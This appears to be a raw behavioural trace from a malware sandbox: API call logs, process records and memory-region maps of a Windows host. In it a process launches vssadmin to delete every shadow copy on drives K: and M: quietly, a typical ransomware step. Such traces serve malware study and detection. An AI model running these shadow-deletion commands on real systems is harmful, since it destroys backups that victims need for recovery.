	[0294.078] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x18) returned 0x46e76d8
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0294.078] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0294.079] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0294.080] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0294.081] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0294.081] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0294.081] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0294.081] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0294.081] GetProcessHeap () returned 0x46e0000
	[0294.081] RtlFreeHeap (HeapHandle=0x46e0000, Flags=0x0, BaseAddress=0x46e76d8) returned 1
	[0294.081] GetProcessHeap () returned 0x46e0000
	[0294.081] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0xa) returned 0x46e9558
	[0294.081] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0294.087] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=K: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f598*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=K: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5e4 | out: lpCommandLine="vssadmin  Delete Shadows /For=K: /All /Quiet ", lpProcessInformation=0x18f5e4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x27c, dwThreadId=0x13bc)) returned 1
	[0294.119] CloseHandle (hObject=0xa4) returned 1
	[0294.119] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0294.119] GetProcessHeap () returned 0x46e0000
	[0294.119] RtlFreeHeap (HeapHandle=0x46e0000, Flags=0x0, BaseAddress=0x46eb858) returned 1
	[0294.119] GetEnvironmentStringsW () returned 0x46ea148*
	[0294.119] GetProcessHeap () returned 0x46e0000
	[0294.120] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0xb9c) returned 0x46eacf0
	[0294.120] memcpy (in: _Dst=0x46eacf0, _Src=0x46ea148, _Size=0xb9c | out: _Dst=0x46eacf0) returned 0x46eacf0
	[0294.120] FreeEnvironmentStringsA (penv="=") returned 1
	[0294.120] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0308.958] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f57c | out: lpExitCode=0x18f57c*=0x2) returned 1
	[0308.959] CloseHandle (hObject=0xa8) returned 1
	[0308.960] _vsnwprintf (in: _Buffer=0x18f664, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f584 | out: _Buffer="00000002") returned 8
	[0308.961] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0308.962] GetProcessHeap () returned 0x46e0000
	[0308.962] RtlFreeHeap (HeapHandle=0x46e0000, Flags=0x0, BaseAddress=0x46eacf0) returned 1
	[0308.963] GetEnvironmentStringsW () returned 0x46ea148*
	[0308.963] GetProcessHeap () returned 0x46e0000
	[0308.963] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0xbc2) returned 0x46ec468
	[0308.963] memcpy (in: _Dst=0x46ec468, _Src=0x46ea148, _Size=0xbc2 | out: _Dst=0x46ec468) returned 0x46ec468
	[0308.963] FreeEnvironmentStringsA (penv="=") returned 1
	[0308.963] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0308.963] GetProcessHeap () returned 0x46e0000
	[0308.963] RtlFreeHeap (HeapHandle=0x46e0000, Flags=0x0, BaseAddress=0x46ec468) returned 1
	[0308.964] GetEnvironmentStringsW () returned 0x46ea148*
	[0308.964] GetProcessHeap () returned 0x46e0000
	[0308.964] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0xbc2) returned 0x46ec468
	[0308.964] memcpy (in: _Dst=0x46ec468, _Src=0x46ea148, _Size=0xbc2 | out: _Dst=0x46ec468) returned 0x46ec468
	[0308.964] FreeEnvironmentStringsA (penv="=") returned 1
	[0308.964] GetProcessHeap () returned 0x46e0000
	[0308.964] RtlFreeHeap (HeapHandle=0x46e0000, Flags=0x0, BaseAddress=0x46e9558) returned 1
	[0308.964] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f610 | out: lpAttributeList=0x18f610) 
	[0308.964] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0308.964] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0309.335] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0309.335] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0309.507] _get_osfhandle (_FileHandle=0) returned 0x38
	[0309.507] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0309.673] SetConsoleInputExeNameW () returned 0x1
	[0309.673] GetConsoleOutputCP () returned 0x1b5
	[0310.031] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0310.031] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0310.596] exit (_Code=2) 

Thread:
	id = 344
	os_tid = 0x1358


Process:
	id = "56"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2d4c4000"
	os_pid = "0x9f0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "50"
	os_parent_pid = "0xa2c"
	cmd_line = "vssadmin  Delete Shadows /For=M: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4160
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4161
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4162
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4163
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4164
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 4165
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 4166
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 4167
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 4168
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 4169
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 4170
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4171
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4172
	        start_va = 0x7f070000
	          end_va = 0x7f092fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f070000"
	        filename = ""

Region:
	              id = 4173
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4174
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4175
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4176
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4177
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4274
	        start_va = 0x400000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4278
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4279
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4282
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4283
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4284
	        start_va = 0x4890000
	          end_va = 0x49cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 4300
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4301
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4310
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4311
	        start_va = 0x7ef70000
	          end_va = 0x7f06ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ef70000"
	        filename = ""

Region:
	              id = 4341
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4342
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4343
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 4344
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4345
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4346
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4347
	        start_va = 0x500000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 4348
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 4373
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 4374
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 4375
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 4376
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 4377
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 4379
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 4380
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 4381
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 4382
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 4383
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 4384
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 4394
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 4395
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 4396
	        start_va = 0x49d0000
	          end_va = 0x4afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049d0000"
	        filename = ""

Region:
	              id = 4397
	        start_va = 0x510000
	          end_va = 0x697fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000510000"
	        filename = ""

Region:
	              id = 4398
	        start_va = 0x4890000
	          end_va = 0x48b9fff
	       monitored = 0
	     entry_point = 0x4895680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4399
	        start_va = 0x48d0000
	          end_va = 0x49cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048d0000"
	        filename = ""

Region:
	              id = 4400
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4408
	        start_va = 0x6a0000
	          end_va = 0x820fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006a0000"
	        filename = ""

Region:
	              id = 4409
	        start_va = 0x4890000
	          end_va = 0x489cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 4410
	        start_va = 0x4b00000
	          end_va = 0x5efffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b00000"
	        filename = ""

Region:
	              id = 4411
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 4412
	        start_va = 0x440000
	          end_va = 0x440fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 4413
	        start_va = 0x48a0000
	          end_va = 0x48a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 4414
	        start_va = 0x49d0000
	          end_va = 0x4ab9fff
	       monitored = 0
	     entry_point = 0x4a0d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 4415
	        start_va = 0x4af0000
	          end_va = 0x4afffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004af0000"
	        filename = ""

Region:
	              id = 4441
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 4853
	        start_va = 0x48b0000
	          end_va = 0x48b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048b0000"
	        filename = ""

Region:
	              id = 4854
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 4855
	        start_va = 0x48c0000
	          end_va = 0x48c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048c0000"
	        filename = ""

Region:
	              id = 4875
	        start_va = 0x450000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000450000"
	        filename = ""

Region:
	              id = 4876
	        start_va = 0x490000
	          end_va = 0x4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000490000"
	        filename = ""

Region:
	              id = 4879
	        start_va = 0x49d0000
	          end_va = 0x4a0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000049d0000"
	        filename = ""

Region:
	              id = 4880
	        start_va = 0x4a10000
	          end_va = 0x4a4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a10000"
	        filename = ""

Region:
	              id = 4881
	        start_va = 0x4a50000
	          end_va = 0x4a8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a50000"
	        filename = ""

Region:
	              id = 4882
	        start_va = 0x4a90000
	          end_va = 0x4acffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a90000"
	        filename = ""

Region:
	              id = 4985
	        start_va = 0x5f00000
	          end_va = 0x5fdffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 4986
	        start_va = 0x5fe0000
	          end_va = 0x605ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005fe0000"
	        filename = ""

Region:
	              id = 4993
	        start_va = 0x4ad0000
	          end_va = 0x4ad8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 322
	os_tid = 0xc8c


Thread:
	id = 330
	os_tid = 0x1204


Thread:
	id = 359
	os_tid = 0x1300


Thread:
	id = 360
	os_tid = 0x718


Thread:
	id = 361
	os_tid = 0x7a4


Process:
	id = "57"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2d4eb000"
	os_pid = "0x644"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "55"
	os_parent_pid = "0xccc"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
